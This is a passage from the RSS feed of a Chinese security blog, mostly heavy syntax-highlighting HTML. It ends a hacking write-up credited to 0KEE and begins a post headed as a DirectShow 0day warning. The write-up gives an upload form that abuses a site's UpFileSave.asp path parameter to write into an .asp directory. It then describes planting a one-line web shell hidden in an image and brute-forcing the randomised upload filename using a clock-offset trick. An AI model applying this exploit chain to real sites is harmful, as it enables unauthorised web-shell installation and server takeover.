!important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">"BtnSubmit"</code> <code class="color1" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #808080 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">name</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">=</code><code class="string" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: blue !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">"Submit"</code> <code class="color1" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #808080 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">value</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">=</code><code class="string" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: blue !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">" 确 定 "</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">&gt;</code></span></span></div>
<div class="line alt1" style="outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;"><code class="number" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #5c5c5c !important; padding-top: 0px !important; padding-right: 0.3em !important; padding-bottom: 0px !important; padding-left: 0px !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: right !important; float: left !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: 3em !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; display: block !important; background-position: initial initial !important; margin: 0px !important; border: 0px !important initial !important initial !important;">7.</code><span class="content" style="margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 3.3em !important; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; border-top-width: 0px !important; border-right-width: 0px !important; border-bottom-width: 0px !important; border-left-width: 3px !important; border-style: initial !important; border-color: initial !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: #ffffff !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; display: block !important; border-left-style: solid !important; border-left-color: #6ce26c !important; color: #000000 !important; background-position: initial initial !important;"><span class="block" style="margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 28px !important; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: url(http://www.pcsec.org/PLUGIN/Codelight/SyntaxHighlighter/Styles/wrapping.png) !important; background-repeat: no-repeat !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; display: block !important; text-indent: -1.5em !important; background-position: 0px 1.1em !important; border: 0px !important initial !important initial !important;"><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">&lt;</code><code class="keyword" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #006699 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: bold !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">input</code> <code class="color1" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #808080 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">type</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">=</code><code class="string" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: blue !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">"reset"</code> <code class="color1" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #808080 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">id</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">=</code><code class="string" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: blue !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">"ResetForm"</code> <code class="color1" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #808080 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">name</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">=</code><code class="string" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: blue !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">"Submit3"</code> <code class="color1" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #808080 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">value</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">=</code><code class="string" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: blue !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">" 重 填 "</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">&gt;</code></span></span></div>
<div class="line alt2" style="outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;"><code class="number" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #5c5c5c !important; padding-top: 0px !important; padding-right: 0.3em !important; padding-bottom: 0px !important; padding-left: 0px !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: right !important; float: left !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: 3em !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; display: block !important; background-position: initial initial !important; margin: 0px !important; border: 0px !important initial !important initial !important;">8.</code><span class="content" style="margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 3.3em !important; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; border-top-width: 0px !important; border-right-width: 0px !important; border-bottom-width: 0px !important; border-left-width: 3px !important; border-style: initial !important; border-color: initial !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: #f8f8f8 !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; display: block !important; border-left-style: solid !important; border-left-color: #6ce26c !important; color: #000000 !important; background-position: initial initial !important;"><span class="block" style="padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: url(http://www.pcsec.org/PLUGIN/Codelight/SyntaxHighlighter/Styles/wrapping.png) !important; background-repeat: no-repeat !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; display: block !important; text-indent: -1.5em !important; background-position: 0px 1.1em !important; margin: 0px !important; border: 0px !important initial !important initial !important;"><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">&lt;/</code><code class="keyword" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #006699 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: bold !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">form</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">&gt;</code></span></span></div>
<div class="line alt2" style="outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;"><span class="content" style="margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 3.3em !important; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; border-top-width: 0px !important; border-right-width: 0px !important; border-bottom-width: 0px !important; border-left-width: 3px !important; border-style: initial !important; border-color: initial !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: #f8f8f8 !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; display: block !important; border-left-style: solid !important; border-left-color: #6ce26c !important; color: #000000 !important; background-position: initial initial !important;"><span class="block" style="text-indent: 0px; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: url(http://www.pcsec.org/PLUGIN/Codelight/SyntaxHighlighter/Styles/wrapping.png) !important; background-repeat: no-repeat !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; display: block !important; background-position: 0px 1.1em !important; margin: 0px !important; border: 0px !important initial !important initial !important;"><span style="color: #333333;"><br />
</span></span></span></div>
<p></span></p>
<p></span></p>
<p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; word-break: break-all; font: normal normal normal 14px/1.8em 'Times New Roman'; padding: 0px;">
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 164px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">&lt;form name=&#8221;FileForm&#8221; method=&#8221;post&#8221; enctype=&#8221;multipart/form-data&#8221; action=&#8221;http://www.bbb.com/User/Commpages/UpFileSave.asp?Path=/userfiles/06150583700/aaa.asp&#8221;&gt;</div>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 164px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">&lt;input type=&#8221;hidden&#8221; name=&#8221;AutoReName&#8221; value=&#8221;2&#8243;&gt;&lt;br&gt;</div>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 164px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">&lt;input type=&#8221;hidden&#8221; name=&#8221;Path&#8221; value=&#8221;/userfiles/06150583700/aaa.asp&#8221;&gt;</div>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 164px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">&lt;input type=&#8221;file&#8221; size=&#8221;20&#8243; name=&#8221;File1&#8243;&gt;</div>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 164px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">&lt;input type=&#8221;hidden&#8221; name=&#8221;FilesNum&#8221; value=&#8221;1&#8243;&gt;</div>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 164px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">&lt;input type=&#8221;submit&#8221; id=&#8221;BtnSubmit&#8221; name=&#8221;Submit&#8221; value=&#8221; 确 定 &#8220;&gt;</div>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 164px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">&lt;input type=&#8221;reset&#8221; id=&#8221;ResetForm&#8221; name=&#8221;Submit3&#8243; value=&#8221; 重 填 &#8220;&gt;</div>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 164px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">&lt;/form&gt;</div>
<p><span style="font-family: verdana; line-height: 21px; color: #333333; font-size: 12px;"></p>
<p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; word-break: break-all; font: normal normal normal 14px/1.8em 'Times New Roman'; padding: 0px;">传个夹带一句话的图片上去<br />
恶心的地方来了，传上去的文件名是日期+时间+5位随机数（可能是4位3位2位1位，反正最大5位），这个我跟bink研究了半天，没有</p>
<p>办法看到-_-，用管中窥豹有个暴力猜接上传路径的功能，先在正常目录里上传个文件，卡一下本地跟远程的时间差，然后传到.asp</p>
<p>目录里，把秒数误差控制在3秒以内，开始跑吧~~然后自己该干嘛干嘛去,RP过关的话几个小时内应该能出结果-_-</p>
<p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; word-break: break-all; font: normal normal normal 14px/1.8em 'Times New Roman'; padding: 0px;">From <a style="color: #333399;" href="http://www.0kee.com/read.php?tid-1041.html" target="_blank">0KEE</a></p>
<p></span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.am82.com/houzan/archives/2230/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DirectShow 0DAY第二波警告！SOS!</title>
		<link>http://www.am82.com/houzan/archives/2172</link>
		<comments>http://www.am82.com/houzan/archives/2172#comments</comments>
		<pubDate>Sun, 05 Jul 2009 00:35:50 +0000</pubDate>
		<dc:creator>假装纯情</dc:creator>
				<category><![CDATA[技术专题]]></category>
		<category><![CDATA[0day]]></category>
